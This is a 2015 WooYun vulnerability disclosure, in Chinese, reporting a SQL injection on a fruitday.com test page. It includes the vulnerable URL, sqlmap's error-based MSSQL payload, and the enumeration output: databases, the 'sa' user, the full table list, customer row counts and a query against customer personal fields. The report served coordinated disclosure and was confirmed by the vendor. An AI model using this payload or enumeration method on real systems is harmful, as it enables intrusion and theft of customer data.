当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0135150

漏洞标题:天天果园某站存在SQL注入(可泄漏27W用户信息以及订单信息)

相关厂商:fruitday.com

漏洞作者: 浮萍

提交时间:2015-08-19 10:30

修复时间:2015-10-03 11:44

公开时间:2015-10-03 11:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-19: 细节已通知厂商并且等待厂商处理中
2015-08-19: 厂商已经确认,细节仅向厂商公开
2015-08-29: 细节向核心白帽子及相关领域专家公开
2015-09-08: 细节向普通白帽子公开
2015-09-18: 细节向实习白帽子公开
2015-10-03: 细节向公众公开

简要描述:

SQL注入漏洞

详细说明:

http://hq.fruitday.com:1300/test/

选区_158.png


刷新后抓post包

http://hq.fruitday.com:1300/test/?Button1=%E5%AE%9D%E5%AE%9D%E6%A0%91%E8%AE%A2%E5%8D%95%E5%8F%91%E8%B4%A7%E4%BF%A1%E6%81%AF%E4%B8%8B%E8%BD%BD&__EVENTVALIDATION=%2FwEWBAKd1qmjCwLg2ZN%2BAsKGtEYCjOeKxgZbFZuhaBWiu7NPcvUNo8jE5zfxE0rx7qf7JmIw%2Fsj6SQ%3D%3D&__VIEWSTATE=%2FwEPDwULLTE3NTUxOTMwMTZkZFJW1VwGHd3j1GqENAXwHTs%2FMwjG%2BRntfJIDTWykxfY0&txtEndDate=2015-8-18&txtStartDate=2015-8-17


选区_160.png


输入'

选区_161.png


漏洞证明:

测试注入点

http://hq.fruitday.com:1300/test/?Button1=%E5%AE%9D%E5%AE%9D%E6%A0%91%E8%AE%A2%E5%8D%95%E5%8F%91%E8%B4%A7%E4%BF%A1%E6%81%AF%E4%B8%8B%E8%BD%BD&__EVENTVALIDATION=%2FwEWBAKd1qmjCwLg2ZN%2BAsKGtEYCjOeKxgZbFZuhaBWiu7NPcvUNo8jE5zfxE0rx7qf7JmIw%2Fsj6SQ%3D%3D&__VIEWSTATE=%2FwEPDwULLTE3NTUxOTMwMTZkZFJW1VwGHd3j1GqENAXwHTs%2FMwjG%2BRntfJIDTWykxfY0&txtEndDate=2015-8-18&txtStartDate=2015-8-17*


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: http://hq.fruitday.com:1300/test/?Button1=%E5%AE%9D%E5%AE%9D%E6%A0%91%E8%AE%A2%E5%8D%95%E5%8F%91%E8%B4%A7%E4%BF%A1%E6%81%AF%E4%B8%8B%E8%BD%BD&__EVENTVALIDATION=/wEWBAKd1qmjCwLg2ZN+AsKGtEYCjOeKxgZbFZuhaBWiu7NPcvUNo8jE5zfxE0rx7qf7JmIw/sj6SQ==&__VIEWSTATE=/wEPDwULLTE3NTUxOTMwMTZkZFJW1VwGHd3j1GqENAXwHTs/MwjG+RntfJIDTWykxfY0&txtEndDate=2015-8-18&txtStartDate=2015-08-17' AND 4689=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(107)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (4689=4689) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(106)+CHAR(122)+CHAR(113))) AND 'RnJS'='RnJS
---


web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005


数据库

available databases [5]:
[*] fday
[*] master
[*] model
[*] msdb
[*] tempdb


当前数据库

current database:    'fday'
current user: 'sa'


查看fday表

Database: fday
[99 tables]
+----------------------------+
| BagOpLog |
| CCBack |
| CancelQueue |
| CardSales |
| Changes |
| CouponInputs |
| CouponRequest |
| CouponSales |
| CouponSalesReturn |
| DeliveryCar |
| DeliveryOrder |
| DeliveryWave |
| Department |
| Enterprise |
| Gifts |
| InputOrderJson |
| InvoiceReccord |
| InvoiceRequest |
| OkCardBill |
| OnlineBankBill |
| OnlineCoupon |
| OrderBak |
| Payments |
| PaymentsTemp |
| PreSellRule |
| Product |
| ProductItem |
| ReChargeInvoice |
| ReturnOrder |
| ShouldTransferAccounts |
| Staff |
| StateSyncQueue |
| TmalJson |
| UnionPayBillDetails |
| aa |
| dtproperties |
| fruit_Activity |
| fruit_ActivityOrderItem |
| fruit_Bag |
| fruit_BagItem |
| fruit_BagItemSet |
| fruit_BagPkg |
| fruit_BagType |
| fruit_CC |
| fruit_Complaint |
| fruit_ComplaintItem |
| fruit_Coupon |
| fruit_CouponType |
| fruit_Customer |
| fruit_DeliveryPerson |
| fruit_ExtraOrderType |
| fruit_ExtraTask |
| fruit_ExtraTaskItem |
| fruit_ExtraWarehouse |
| fruit_GoldenCardBill |
| fruit_GroupOrder |
| fruit_GroupOrderItem |
| fruit_Menu |
| fruit_OnlinePay |
| fruit_OrderItemV2 |
| fruit_OrderModifyLog |
| fruit_OrderOpRemark |
| fruit_OrderPayInfo |
| fruit_OrderPkg |
| fruit_OrderSerial |
| fruit_OrderV2 |
| fruit_PayMethodReccord |
| fruit_PayMethodReccordV1 |
| fruit_PkgItem |
| fruit_PkgType |
| fruit_Po |
| fruit_PoInStockDetails |
| fruit_PoItem |
| fruit_ProdSingleReturn |
| fruit_ProdType |
| fruit_RefundRecord |
| fruit_Stock |
| fruit_Store |
| fruit_StoreRequestBillItem |
| fruit_StoreRequestPkg |
| fruit_StoreRequstBill |
| fruit_SubMenu |
| fruit_Supplier |
| fruit_SupplierPayment |
| fruit_SupplierProd |
| fruit_UnPaidReccord |
| fruit_User |
| fruit_UserMenu |
| fruit_orderItemBak |
| fruit_orderPayment |
| material_RequestOrder |
| material_RequestOrderItem |
| preOrder |
| preOrderItem |
| sysdiagrams |
| tab_view_product_storage |
| test1 |
| view_OutPutStock |
| view_ReturnProd_OrderNum |
+----------------------------+


select count(*) from fruit_Customer ;:    '276588'
select count(*) from preOrder;: '17019'
select count(*) from fruit_User;: '377'


查看一条数据

SELECT TOP 1 age_Range, custom_Address, custom_Level, custom_Mobile, custom_Name, custom_Remark, custom_Tel, custom_Type, department, eAddress, eName, enterprise_Id, id, lastorder_Time, order_Count, salesMan, sex  FROM fruit_Customer


选区_162.png


order应该是订单 stock是库存 staff应该就是员工
其他的表就不查看

修复方案:

版权声明:转载请注明来源 浮萍@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-08-19 11:43

厂商回复:

非常感谢您提供的信息,我们会尽快确认。

最新状态:

暂无